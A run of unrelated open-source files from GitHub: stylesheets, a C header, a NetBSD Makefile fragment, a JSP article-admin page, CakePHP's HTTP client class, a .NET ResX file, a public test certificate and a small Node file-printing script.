$light-gray2; @include background-dark($dark-gray2); } &.headerSortDown:after { content: " ↑"; } &.headerSortUp:after { content: " ↓"; } } td.name a { text-decoration: none; color: inherit; } tr.total td, tr.total_dynamic td { font-weight: bold; border-top: 1px solid #ccc; border-bottom: none; } tr.file:hover { background: $light-gray2; @include background-dark($dark-gray2); td.name { text-decoration: underline; color: inherit; } } } // scroll marker styles #scroll_marker { position: fixed; right: 0; top: 0; width: 16px; height: 100%; background: $light-bg; border-left: 1px solid $light-gray2; @include background-dark($dark-bg); @include border-color-dark($dark-gray2); will-change: transform; // for faster scrolling of fixed element in Chrome .marker { background: $light-gray3; @include background-dark($dark-gray3); position: absolute; min-height: 3px; width: 100%; } }
{ "pile_set_name": "Github" }
// Google Code Prettify styles .com { color: #999; } .lit { color: #195f91; } .pun, .opn, .clo { color: #93a1a1; } .fun { color: #dc322f; } .str, .atv { color: #C7254E; } .kwd, .prettyprint .tag { color: #2F6F9F; } .typ, .atn, .dec, .var { color: #428BCA; } .pln { color: #333; } .prettyprint { padding: 9px 14px; margin-bottom: 20px; margin-top: 20px; border: 1px solid #eee; &.linenums { -webkit-box-shadow: inset 40px 0 0 #fbfbfb, inset 41px 0 0 #f6f6f6; -moz-box-shadow: inset 40px 0 0 #fbfbfb, inset 41px 0 0 #f6f6f6; box-shadow: inset 40px 0 0 #fbfbfb, inset 41px 0 0 #f6f6f6; } } // Specify class=linenums on a pre to get line numbering ol.linenums { margin: 0 0 0 -12px; li { padding-left: 12px; color: #bebebe; line-height: 18px; } }
{ "pile_set_name": "Github" }
/****************************************************************************** ******************************************************************************* ** ** Copyright (C) 2005 Red Hat, Inc. All rights reserved. ** ** This copyrighted material is made available to anyone wishing to use, ** modify, copy, or redistribute it subject to the terms and conditions ** of the GNU General Public License v.2. ** ******************************************************************************* ******************************************************************************/ #ifndef __UTIL_DOT_H__ #define __UTIL_DOT_H__ void dlm_message_out(struct dlm_message *ms); void dlm_message_in(struct dlm_message *ms); void dlm_rcom_out(struct dlm_rcom *rc); void dlm_rcom_in(struct dlm_rcom *rc); #endif
{ "pile_set_name": "Github" }
# $NetBSD: Makefile.parselist,v 1.6 2008/10/19 22:05:20 apb Exp $ # # Makefile snippet to setup parselist.awk related variables: # PARSELISTENV environment variables to pass to parselist.awk # (may be appended to by caller) # PARSELISTDEP dependency on parselist.awk # PARSELIST run ${PARSELISTENV} awk -f ${PARSELISTDEP} # .if !defined(_MAKEFILE_PARSELIST_) _MAKEFILE_PARSELIST_=1 PARSELISTENV+= NETBSDSRCDIR=${NETBSDSRCDIR:Q} \ CRUNCHBIN=${CRUNCHBIN:Q} \ CURDIR=${.CURDIR:Q} \ DESTDIR=${DESTDIR:Q} \ DISTRIBDIR=${DISTRIBDIR:Q} \ MACHINE=${MACHINE:Q} \ MACHINE_ARCH=${MACHINE_ARCH:Q} \ MAKE=${MAKE:Q} \ OBJDIR=${.OBJDIR:Q} PARSELISTDEP= ${DISTRIBDIR}/common/parselist.awk PARSELIST= ${PARSELISTENV} ${TOOL_AWK} -f ${PARSELISTDEP} .endif # _MAKEFILE_PARSELIST_
{ "pile_set_name": "Github" }
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8" %> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>articleManger</title> <link rel="stylesheet" type="text/css" href="${pageContext.request.contextPath}/jquery-easyui-1.3.3/themes/default/easyui.css"> <link rel="stylesheet" type="text/css" href="${pageContext.request.contextPath}/jquery-easyui-1.3.3/themes/icon.css"> <script type="text/javascript" src="${pageContext.request.contextPath}/jquery-easyui-1.3.3/jquery.min.js"></script> <script type="text/javascript" src="${pageContext.request.contextPath}/jquery-easyui-1.3.3/jquery.easyui.min.js"></script> <script type="text/javascript" src="${pageContext.request.contextPath}/jquery-easyui-1.3.3/locale/easyui-lang-zh_CN.js"></script> <script type="text/javascript" src="${pageContext.request.contextPath}/ueditor/ueditor.config.js"> </script> <script type="text/javascript" src="${pageContext.request.contextPath}/ueditor/ueditor.all.min.js"> </script> </head> <body style="margin:1px;" id="ff"> <table id="dg" title="文本信息管理" class="easyui-datagrid" pagination="true" rownumbers="true" fit="true" url="${pageContext.request.contextPath}/articles/datagrid" toolbar="#tb"> <thead data-options="frozen:true"> <tr> <th field="cb" checkbox="true" align="center"></th> <th field="id" width="10%" align="center" hidden="true">编号</th> <th field="articleTitle" width="200" align="center">标题</th> <th field="articleCreateDate" width="150" align="center">创建时间</th> <th field="addName" width="150" align="center">添加人</th> <th field="content" width="70" align="center" formatter="formatHref">操作 </th> </tr> </thead> </table> <div id="tb"> <div> <a href="javascript:openArticleAddDialog()" class="easyui-linkbutton" iconCls="icon-add" plain="true">添加</a> <a href="javascript:openArticleModifyDialog()" class="easyui-linkbutton" iconCls="icon-edit" plain="true">修改</a> <a href="javascript:deleteArticle()" class="easyui-linkbutton" iconCls="icon-remove" plain="true">删除</a> </div> <div> &nbsp;标题:&nbsp;<input type="text" id="articleTitle" size="20" onkeydown="if(event.keyCode==13) searchArticle()"/>&nbsp; <a href="javascript:searchArticle()" class="easyui-linkbutton" iconCls="icon-search" plain="true">搜索</a> </div> </div> <div id="dlg" class="easyui-dialog" style="width: 850px;height:555px;padding: 10px 20px; position: relative; z-index:1000;" closed="true" buttons="#dlg-buttons"> <form id="fm" method="post"> <table cellspacing="8px"> <tr> <td>标题:</td> <td><input type="text" id="title" name="articleTitle" class="easyui-validatebox" required="true"/>&nbsp;<font color="red">*</font> <input id="articleIdfm" name="id" type="hidden" value="0"> </td> </tr> <tr> <td>添加人:</td> <td><input type="text" id="addName" name="addName"/> </td> </tr> <tr> <td>详细内容</td> <td id="editor"> </td> </tr> </table> </form> </div> <div id="dlg-buttons"> <a href="javascript:saveArticle()" class="easyui-linkbutton" iconCls="icon-ok">保存</a> <a href="javascript:closeArticleDialog()" class="easyui-linkbutton" iconCls="icon-cancel">关闭</a> </div> <script type="text/javascript"> var url = "${pageContext.request.contextPath}/articles"; var method; function ResetEditor() { UE.getEditor('myEditor', { initialFrameHeight: 480, initialFrameWidth: 660, enableAutoSave: false, elementPathEnabled: false, wordCount: false, /* toolbars: [ [ 'fontfamily', 'fontsize', 'forecolor', 'backcolor', 'bold', 'italic', 'underline', '|', 'link', '|', ] ] */ }); } function searchArticle() { $("#dg").datagrid('load', { "articleTitle": $("#articleTitle").val(), }); } function deleteArticle() { var selectedRows = $("#dg").datagrid('getSelections'); if (selectedRows.length == 0) { $.messager.alert("系统提示", "请选择要删除的数据!"); return; } var strIds = []; for (var i = 0; i < selectedRows.length; i++) { strIds.push(selectedRows[i].id); } var ids = strIds.join(","); $.messager .confirm( "系统提示", "您确认要删除这<font color=red>" + selectedRows.length + "</font>条数据吗?", function (r) { if (r) { $.ajax({ type: "DELETE",//方法类型 dataType: "json",//预期服务器返回的数据类型 url: "/articles/" + ids,//url data: {}, success: function (result) { console.log(result);//打印服务端返回的数据 if (result.resultCode == 200) { $.messager.alert( "系统提示", "数据已成功删除!"); $("#dg").datagrid( "reload"); } else { $.messager.alert( "系统提示", "数据删除失败!"); } ; }, error: function () { $.messager.alert("ERROR!"); } }); } }); } function openArticleAddDialog() { var html = '<div id="myEditor" name="articleContent"></div>'; $('#editor').append(html); ResetEditor(editor); var ue = UE.getEditor('myEditor'); ue.setContent(""); $("#dlg").dialog("open").dialog("setTitle", "添加文本信息"); method = "POST"; } function saveArticle() { var title = $("#title").val(); var addName = $("#addName").val(); var content = UE.getEditor('myEditor').getContent(); var id = $("#articleIdfm").val(); var data = {"id": id, "articleTitle": title, "articleContent": content, "addName": addName} $.ajax({ type: method,//方法类型 dataType: "json",//预期服务器返回的数据类型 url: url,//url contentType: "application/json; charset=utf-8", data: JSON.stringify(data), success: function (result) { console.log(result);//打印服务端返回的数据 if (result.resultCode == 200) { $.messager.alert("系统提示", "保存成功"); $("#dlg").dialog("close"); $("#dg").datagrid("reload"); resetValue(); } else { $.messager.alert("系统提示", "操作失败"); $("#dlg").dialog("close"); resetValue(); } ; }, error: function () { $.messager.alert("系统提示", "操作失败"); } }); } function openArticleModifyDialog() { var selectedRows = $("#dg").datagrid('getSelections'); if (selectedRows.length != 1) { $.messager.alert("系统提示", "请选择一条要编辑的数据!"); return; } var row = selectedRows[0]; $("#dlg").dialog("open").dialog("setTitle", "修改信息"); $('#fm').form('load', row); var html = '<div id="myEditor" name="articleContent"></div>'; $('#editor').append(html); ResetEditor(editor); var ue = UE.getEditor('myEditor'); ue.setContent(row.articleContent); method = "PUT"; $("#articleIdfm").val(row.id); } function formatHref(val, row) { return "<a href='${pageContext.request.contextPath}/article.html?id=" + row.id + "' target='_blank'>查看详情</a>"; } function resetValue() { $("#title").val(""); $("#addName").val(""); $("#container").val(""); ResetEditor(); } function closeArticleDialog() { $("#dlg").dialog("close"); resetValue(); } </script> </body> </html>
{ "pile_set_name": "Github" }
<?php declare(strict_types=1); /** * CakePHP(tm) : Rapid Development Framework (https://cakephp.org) * Copyright (c) Cake Software Foundation, Inc. (https://cakefoundation.org) * * Licensed under The MIT License * Redistributions of files must retain the above copyright notice. * * @copyright Copyright (c) Cake Software Foundation, Inc. (https://cakefoundation.org) * @link https://cakephp.org CakePHP(tm) Project * @since 3.0.0 * @license https://opensource.org/licenses/mit-license.php MIT License */ namespace Cake\Http; use Cake\Core\App; use Cake\Core\Exception\Exception; use Cake\Core\InstanceConfigTrait; use Cake\Http\Client\Adapter\Curl; use Cake\Http\Client\Adapter\Stream; use Cake\Http\Client\AdapterInterface; use Cake\Http\Client\Request; use Cake\Http\Client\Response; use Cake\Http\Cookie\CookieCollection; use Cake\Http\Cookie\CookieInterface; use Cake\Utility\Hash; use InvalidArgumentException; use Laminas\Diactoros\Uri; use Psr\Http\Client\ClientInterface; use Psr\Http\Message\RequestInterface; use Psr\Http\Message\ResponseInterface; /** * The end user interface for doing HTTP requests. * * ### Scoped clients * * If you're doing multiple requests to the same hostname it's often convenient * to use the constructor arguments to create a scoped client. This allows you * to keep your code DRY and not repeat hostnames, authentication, and other options. * * ### Doing requests * * Once you've created an instance of Client you can do requests * using several methods. Each corresponds to a different HTTP method. * * - get() * - post() * - put() * - delete() * - patch() * * ### Cookie management * * Client will maintain cookies from the responses done with * a client instance. These cookies will be automatically added * to future requests to matching hosts. Cookies will respect the * `Expires`, `Path` and `Domain` attributes. You can get the client's * CookieCollection using cookies() * * You can use the 'cookieJar' constructor option to provide a custom * cookie jar instance you've restored from cache/disk. By default * an empty instance of Cake\Http\Client\CookieCollection will be created. * * ### Sending request bodies * * By default any POST/PUT/PATCH/DELETE request with $data will * send their data as `application/x-www-form-urlencoded` unless * there are attached files. In that case `multipart/form-data` * will be used. * * When sending request bodies you can use the `type` option to * set the Content-Type for the request: * * ``` * $http->get('/users', [], ['type' => 'json']); * ``` * * The `type` option sets both the `Content-Type` and `Accept` header, to * the same mime type. When using `type` you can use either a full mime * type or an alias. If you need different types in the Accept and Content-Type * headers you should set them manually and not use `type` * * ### Using authentication * * By using the `auth` key you can use authentication. The type sub option * can be used to specify which authentication strategy you want to use. * CakePHP comes with a few built-in strategies: * * - Basic * - Digest * - Oauth * * ### Using proxies * * By using the `proxy` key you can set authentication credentials for * a proxy if you need to use one. The type sub option can be used to * specify which authentication strategy you want to use. * CakePHP comes with built-in support for basic authentication. */ class Client implements ClientInterface { use InstanceConfigTrait; /** * Default configuration for the client. * * @var array */ protected $_defaultConfig = [ 'adapter' => null, 'host' => null, 'port' => null, 'scheme' => 'http', 'timeout' => 30, 'ssl_verify_peer' => true, 'ssl_verify_peer_name' => true, 'ssl_verify_depth' => 5, 'ssl_verify_host' => true, 'redirect' => false, 'protocolVersion' => '1.1', ]; /** * List of cookies from responses made with this client. * * Cookies are indexed by the cookie's domain or * request host name. * * @var \Cake\Http\Cookie\CookieCollection */ protected $_cookies; /** * Adapter for sending requests. * * @var \Cake\Http\Client\AdapterInterface */ protected $_adapter; /** * Create a new HTTP Client. * * ### Config options * * You can set the following options when creating a client: * * - host - The hostname to do requests on. * - port - The port to use. * - scheme - The default scheme/protocol to use. Defaults to http. * - timeout - The timeout in seconds. Defaults to 30 * - ssl_verify_peer - Whether or not SSL certificates should be validated. * Defaults to true. * - ssl_verify_peer_name - Whether or not peer names should be validated. * Defaults to true. * - ssl_verify_depth - The maximum certificate chain depth to traverse. * Defaults to 5. * - ssl_verify_host - Verify that the certificate and hostname match. * Defaults to true. * - redirect - Number of redirects to follow. Defaults to false. * - adapter - The adapter class name or instance. Defaults to * \Cake\Http\Client\Adapter\Curl if `curl` extension is loaded else * \Cake\Http\Client\Adapter\Stream. * - protocolVersion - The HTTP protocol version to use. Defaults to 1.1 * * @param array $config Config options for scoped clients. * @throws \InvalidArgumentException */ public function __construct(array $config = []) { $this->setConfig($config); $adapter = $this->_config['adapter']; if ($adapter === null) { $adapter = Curl::class; if (!extension_loaded('curl')) { $adapter = Stream::class; } } else { $this->setConfig('adapter', null); } if (is_string($adapter)) { $adapter = new $adapter(); } if (!$adapter instanceof AdapterInterface) { throw new InvalidArgumentException('Adapter must be an instance of Cake\Http\Client\AdapterInterface'); } $this->_adapter = $adapter; if (!empty($this->_config['cookieJar'])) { $this->_cookies = $this->_config['cookieJar']; $this->setConfig('cookieJar', null); } else { $this->_cookies = new CookieCollection(); } } /** * Get the cookies stored in the Client. * * @return \Cake\Http\Cookie\CookieCollection */ public function cookies(): CookieCollection { return $this->_cookies; } /** * Adds a cookie to the Client collection. * * @param \Cake\Http\Cookie\CookieInterface $cookie Cookie object. * @return $this * @throws \InvalidArgumentException */ public function addCookie(CookieInterface $cookie) { if (!$cookie->getDomain() || !$cookie->getPath()) { throw new InvalidArgumentException('Cookie must have a domain and a path set.'); } $this->_cookies = $this->_cookies->add($cookie); return $this; } /** * Do a GET request. * * The $data argument supports a special `_content` key * for providing a request body in a GET request. This is * generally not used, but services like ElasticSearch use * this feature. * * @param string $url The url or path you want to request. * @param array|string $data The query data you want to send. * @param array $options Additional options for the request. * @return \Cake\Http\Client\Response */ public function get(string $url, $data = [], array $options = []): Response { $options = $this->_mergeOptions($options); $body = null; if (is_array($data) && isset($data['_content'])) { $body = $data['_content']; unset($data['_content']); } $url = $this->buildUrl($url, $data, $options); return $this->_doRequest( Request::METHOD_GET, $url, $body, $options ); } /** * Do a POST request. * * @param string $url The url or path you want to request. * @param mixed $data The post data you want to send. * @param array $options Additional options for the request. * @return \Cake\Http\Client\Response */ public function post(string $url, $data = [], array $options = []): Response { $options = $this->_mergeOptions($options); $url = $this->buildUrl($url, [], $options); return $this->_doRequest(Request::METHOD_POST, $url, $data, $options); } /** * Do a PUT request. * * @param string $url The url or path you want to request. * @param mixed $data The request data you want to send. * @param array $options Additional options for the request. * @return \Cake\Http\Client\Response */ public function put(string $url, $data = [], array $options = []): Response { $options = $this->_mergeOptions($options); $url = $this->buildUrl($url, [], $options); return $this->_doRequest(Request::METHOD_PUT, $url, $data, $options); } /** * Do a PATCH request. * * @param string $url The url or path you want to request. * @param mixed $data The request data you want to send. * @param array $options Additional options for the request. * @return \Cake\Http\Client\Response */ public function patch(string $url, $data = [], array $options = []): Response { $options = $this->_mergeOptions($options); $url = $this->buildUrl($url, [], $options); return $this->_doRequest(Request::METHOD_PATCH, $url, $data, $options); } /** * Do an OPTIONS request. * * @param string $url The url or path you want to request. * @param mixed $data The request data you want to send. * @param array $options Additional options for the request. * @return \Cake\Http\Client\Response */ public function options(string $url, $data = [], array $options = []): Response { $options = $this->_mergeOptions($options); $url = $this->buildUrl($url, [], $options); return $this->_doRequest(Request::METHOD_OPTIONS, $url, $data, $options); } /** * Do a TRACE request. * * @param string $url The url or path you want to request. * @param mixed $data The request data you want to send. * @param array $options Additional options for the request. * @return \Cake\Http\Client\Response */ public function trace(string $url, $data = [], array $options = []): Response { $options = $this->_mergeOptions($options); $url = $this->buildUrl($url, [], $options); return $this->_doRequest(Request::METHOD_TRACE, $url, $data, $options); } /** * Do a DELETE request. * * @param string $url The url or path you want to request. * @param mixed $data The request data you want to send. * @param array $options Additional options for the request. * @return \Cake\Http\Client\Response */ public function delete(string $url, $data = [], array $options = []): Response { $options = $this->_mergeOptions($options); $url = $this->buildUrl($url, [], $options); return $this->_doRequest(Request::METHOD_DELETE, $url, $data, $options); } /** * Do a HEAD request. * * @param string $url The url or path you want to request. * @param array $data The query string data you want to send. * @param array $options Additional options for the request. * @return \Cake\Http\Client\Response */ public function head(string $url, array $data = [], array $options = []): Response { $options = $this->_mergeOptions($options); $url = $this->buildUrl($url, $data, $options); return $this->_doRequest(Request::METHOD_HEAD, $url, '', $options); } /** * Helper method for doing non-GET requests. * * @param string $method HTTP method. * @param string $url URL to request. * @param mixed $data The request body. * @param array $options The options to use. Contains auth, proxy, etc. * @return \Cake\Http\Client\Response */ protected function _doRequest(string $method, string $url, $data, $options): Response { $request = $this->_createRequest( $method, $url, $data, $options ); return $this->send($request, $options); } /** * Does a recursive merge of the parameter with the scope config. * * @param array $options Options to merge. * @return array Options merged with set config. */ protected function _mergeOptions(array $options): array { return Hash::merge($this->_config, $options); } /** * Sends a PSR-7 request and returns a PSR-7 response. * * @param \Psr\Http\Message\RequestInterface $request Request instance. * @return \Psr\Http\Message\ResponseInterface Response instance. * @throws \Psr\Http\Client\ClientExceptionInterface If an error happens while processing the request. */ public function sendRequest(RequestInterface $request): ResponseInterface { return $this->send($request, $this->_config); } /** * Send a request. * * Used internally by other methods, but can also be used to send * handcrafted Request objects. * * @param \Psr\Http\Message\RequestInterface $request The request to send. * @param array $options Additional options to use. * @return \Cake\Http\Client\Response */ public function send(RequestInterface $request, array $options = []): Response { $redirects = 0; if (isset($options['redirect'])) { $redirects = (int)$options['redirect']; unset($options['redirect']); } do { $response = $this->_sendRequest($request, $options); $handleRedirect = $response->isRedirect() && $redirects-- > 0; if ($handleRedirect) { $url = $request->getUri(); $location = $response->getHeaderLine('Location'); $locationUrl = $this->buildUrl($location, [], [ 'host' => $url->getHost(), 'port' => $url->getPort(), 'scheme' => $url->getScheme(), 'protocolRelative' => true, ]); $request = $request->withUri(new Uri($locationUrl)); $request = $this->_cookies->addToRequest($request, []); } } while ($handleRedirect); return $response; } /** * Send a request without redirection. * * @param \Psr\Http\Message\RequestInterface $request The request to send. * @param array $options Additional options to use. * @return \Cake\Http\Client\Response */ protected function _sendRequest(RequestInterface $request, array $options): Response { $responses = $this->_adapter->send($request, $options); foreach ($responses as $response) { $this->_cookies = $this->_cookies->addFromResponse($response, $request); } return array_pop($responses); } /** * Generate a URL based on the scoped client options. * * @param string $url Either a full URL or just the path. * @param string|array $query The query data for the URL. * @param array $options The config options stored with Client::config() * @return string A complete url with scheme, port, host, and path. */ public function buildUrl(string $url, $query = [], array $options = []): string { if (empty($options) && empty($query)) { return $url; } if ($query) { $q = strpos($url, '?') === false ? '?' : '&'; $url .= $q; $url .= is_string($query) ? $query : http_build_query($query); } $defaults = [ 'host' => null, 'port' => null, 'scheme' => 'http', 'protocolRelative' => false, ]; $options += $defaults; if ($options['protocolRelative'] && preg_match('#^//#', $url)) { $url = $options['scheme'] . ':' . $url; } if (preg_match('#^https?://#', $url)) { return $url; } $defaultPorts = [ 'http' => 80, 'https' => 443, ]; $out = $options['scheme'] . '://' . $options['host']; if ($options['port'] && (int)$options['port'] !== $defaultPorts[$options['scheme']]) { $out .= ':' . $options['port']; } $out .= '/' . ltrim($url, '/'); return $out; } /** * Creates a new request object based on the parameters. * * @param string $method HTTP method name. * @param string $url The url including query string. * @param mixed $data The request body. * @param array $options The options to use. Contains auth, proxy, etc. * @return \Cake\Http\Client\Request */ protected function _createRequest(string $method, string $url, $data, $options): Request { $headers = (array)($options['headers'] ?? []); if (isset($options['type'])) { $headers = array_merge($headers, $this->_typeHeaders($options['type'])); } if (is_string($data) && !isset($headers['Content-Type']) && !isset($headers['content-type'])) { $headers['Content-Type'] = 'application/x-www-form-urlencoded'; } $request = new Request($url, $method, $headers, $data); /** @var \Cake\Http\Client\Request $request */ $request = $request->withProtocolVersion($this->getConfig('protocolVersion')); $cookies = $options['cookies'] ?? []; /** @var \Cake\Http\Client\Request $request */ $request = $this->_cookies->addToRequest($request, $cookies); if (isset($options['auth'])) { $request = $this->_addAuthentication($request, $options); } if (isset($options['proxy'])) { $request = $this->_addProxy($request, $options); } return $request; } /** * Returns headers for Accept/Content-Type based on a short type * or full mime-type. * * @param string $type short type alias or full mimetype. * @return string[] Headers to set on the request. * @throws \Cake\Core\Exception\Exception When an unknown type alias is used. * @psalm-return array{Accept: string, Content-Type: string} */ protected function _typeHeaders(string $type): array { if (strpos($type, '/') !== false) { return [ 'Accept' => $type, 'Content-Type' => $type, ]; } $typeMap = [ 'json' => 'application/json', 'xml' => 'application/xml', ]; if (!isset($typeMap[$type])) { throw new Exception("Unknown type alias '$type'."); } return [ 'Accept' => $typeMap[$type], 'Content-Type' => $typeMap[$type], ]; } /** * Add authentication headers to the request. * * Uses the authentication type to choose the correct strategy * and use its methods to add headers. * * @param \Cake\Http\Client\Request $request The request to modify. * @param array $options Array of options containing the 'auth' key. * @return \Cake\Http\Client\Request The updated request object. */ protected function _addAuthentication(Request $request, array $options): Request { $auth = $options['auth']; /** @var \Cake\Http\Client\Auth\Basic $adapter */ $adapter = $this->_createAuth($auth, $options); return $adapter->authentication($request, $options['auth']); } /** * Add proxy authentication headers. * * Uses the authentication type to choose the correct strategy * and use its methods to add headers. * * @param \Cake\Http\Client\Request $request The request to modify. * @param array $options Array of options containing the 'proxy' key. * @return \Cake\Http\Client\Request The updated request object. */ protected function _addProxy(Request $request, array $options): Request { $auth = $options['proxy']; /** @var \Cake\Http\Client\Auth\Basic $adapter */ $adapter = $this->_createAuth($auth, $options); return $adapter->proxyAuthentication($request, $options['proxy']); } /** * Create the authentication strategy. * * Use the configuration options to create the correct * authentication strategy handler. * * @param array $auth The authentication options to use. * @param array $options The overall request options to use. * @return object Authentication strategy instance. * @throws \Cake\Core\Exception\Exception when an invalid strategy is chosen. */ protected function _createAuth(array $auth, array $options) { if (empty($auth['type'])) { $auth['type'] = 'basic'; } $name = ucfirst($auth['type']); $class = App::className($name, 'Http/Client/Auth'); if (!$class) { throw new Exception( sprintf('Invalid authentication type %s', $name) ); } return new $class($this, $options); } }
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <root> <!-- Microsoft ResX Schema Version 2.0 The primary goals of this format is to allow a simple XML format that is mostly human readable. The generation and parsing of the various data types are done through the TypeConverter classes associated with the data types. Example: ... ado.net/XML headers & schema ... <resheader name="resmimetype">text/microsoft-resx</resheader> <resheader name="version">2.0</resheader> <resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader> <resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader> <data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data> <data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data> <data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64"> <value>[base64 mime encoded serialized .NET Framework object]</value> </data> <data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64"> <value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value> <comment>This is a comment</comment> </data> There are any number of "resheader" rows that contain simple name/value pairs. Each data row contains a name, and value. The row also contains a type or mimetype. Type corresponds to a .NET class that support text/value conversion through the TypeConverter architecture. Classes that don't support this are serialized and stored with the mimetype set. The mimetype is used for serialized objects, and tells the ResXResourceReader how to depersist the object. This is currently not extensible. For a given mimetype the value must be set accordingly: Note - application/x-microsoft.net.object.binary.base64 is the format that the ResXResourceWriter will generate, however the reader can read any of the formats listed below. mimetype: application/x-microsoft.net.object.binary.base64 value : The object must be serialized with : System.Runtime.Serialization.Formatters.Binary.BinaryFormatter : and then encoded with base64 encoding. mimetype: application/x-microsoft.net.object.soap.base64 value : The object must be serialized with : System.Runtime.Serialization.Formatters.Soap.SoapFormatter : and then encoded with base64 encoding. mimetype: application/x-microsoft.net.object.bytearray.base64 value : The object must be serialized into a byte array : using a System.ComponentModel.TypeConverter : and then encoded with base64 encoding. --> <xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata"> <xsd:import namespace="http://www.w3.org/XML/1998/namespace" /> <xsd:element name="root" msdata:IsDataSet="true"> <xsd:complexType> <xsd:choice maxOccurs="unbounded"> <xsd:element name="metadata"> <xsd:complexType> <xsd:sequence> <xsd:element name="value" type="xsd:string" minOccurs="0" /> </xsd:sequence> <xsd:attribute name="name" use="required" type="xsd:string" /> <xsd:attribute name="type" type="xsd:string" /> <xsd:attribute name="mimetype" type="xsd:string" /> <xsd:attribute ref="xml:space" /> </xsd:complexType> </xsd:element> <xsd:element name="assembly"> <xsd:complexType> <xsd:attribute name="alias" type="xsd:string" /> <xsd:attribute name="name" type="xsd:string" /> </xsd:complexType> </xsd:element> <xsd:element name="data"> <xsd:complexType> <xsd:sequence> <xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" /> <xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" /> </xsd:sequence> <xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" /> <xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" /> <xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" /> <xsd:attribute ref="xml:space" /> </xsd:complexType> </xsd:element> <xsd:element name="resheader"> <xsd:complexType> <xsd:sequence> <xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" /> </xsd:sequence> <xsd:attribute name="name" type="xsd:string" use="required" /> </xsd:complexType> </xsd:element> </xsd:choice> </xsd:complexType> </xsd:element> </xsd:schema> <resheader name="resmimetype"> <value>text/microsoft-resx</value> </resheader> <resheader name="version"> <value>2.0</value> </resheader> <resheader name="reader"> <value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value> </resheader> <resheader name="writer"> <value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value> </resheader> <metadata name="folderBrowserDialog1.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"> <value>17, 17</value> </metadata> </root>
{ "pile_set_name": "Github" }
-----BEGIN CERTIFICATE----- MIIDLjCCAhagAwIBAgIBATANBgkqhkiG9w0BAQUFADA3MREwDwYDVQQLDAhTZWN1 cml0eTEUMBIGA1UEAwwLTkRHIFRlc3QgQ0ExDDAKBgNVBAoMA05ERzAeFw0xNTAx MjExNDMzMThaFw0yMDAxMjAxNDMzMThaMDcxETAPBgNVBAsMCFNlY3VyaXR5MRQw EgYDVQQDDAtOREcgVGVzdCBDQTEMMAoGA1UECgwDTkRHMIIBIjANBgkqhkiG9w0B AQEFAAOCAQ8AMIIBCgKCAQEArq4QKUTRq45nCDR/p+OlHIIN8+ugUbiCfteazbTG rX8vIQ9HxSuz/xvxTw+E0KgA4YSK2SJJP4QiCjlMKYS3Rt8o361GNtnRmeo5qyBu GMSv73XL1uuqumggUZyrhhksckR7gyNFnKVXzZjAQPepsT0xBjs5uEAEqXJzAf+r 24AnT3MZRh7gsyEe3sZjd75kZVwcrWhrocyKlMCR77yEr+uP4pg+dEMhDMKKxlaF C5RPMotOpWm/7AToHrGia34WSmcxvuOwxOkI4xEW6mxWMaVTBCXUh6Wb/0m/x8Nv 9VvS2UBC4sCp4MqlDpySxQpT1RgrhMTEmtUOh50l4eEhdwIDAQABo0UwQzASBgNV HRMBAf8ECDAGAQH/AgEAMA4GA1UdDwEB/wQEAwIBBjAdBgNVHQ4EFgQUkEvQjGOP Oj5DZEvsm96AdiiFXWgwDQYJKoZIhvcNAQEFBQADggEBAGD0kQASmNzvtYL+JUGf gTPyJhADl9Ai9GvZJsY/wX0IRTxRl5y08Dqlg3qyGG3GzL918cr1sVCYnLepNQES T0MIz50DCKGryNSc74JHPDxpYaSV6whmNH5iwh8fy6tmJwF3FWbGXD2ddc+ofJqP WPPJtzqxuuJ6iXQIFqD9mEn3iXVcvFuSzpdpH9paORTKB0j4gya9zctB8LP0ZXIE //wREc+4msnmoTn+qkFAOPBg9WnvoipfyCXPgbTagxlofVjZ7gAgYIefqhXBTQdd 5tnYdyQQBRcUXQS2bBX03q8ftcxOjc3SvXI4MvrqofuFPwu4GnrspnC0KQYlXwEI 7ds= -----END CERTIFICATE-----
{ "pile_set_name": "Github" }
#!/usr/bin/env node var cli = require('cli'); var output_file = function (file) { cli.withInput(file, function (line, sep, eof) { if (!eof) { cli.output(line + sep); } else if (cli.args.length) { output_file(cli.args.shift()); } }); }; if (cli.args.length) { output_file(cli.args.shift()); }
{ "pile_set_name": "Github" }
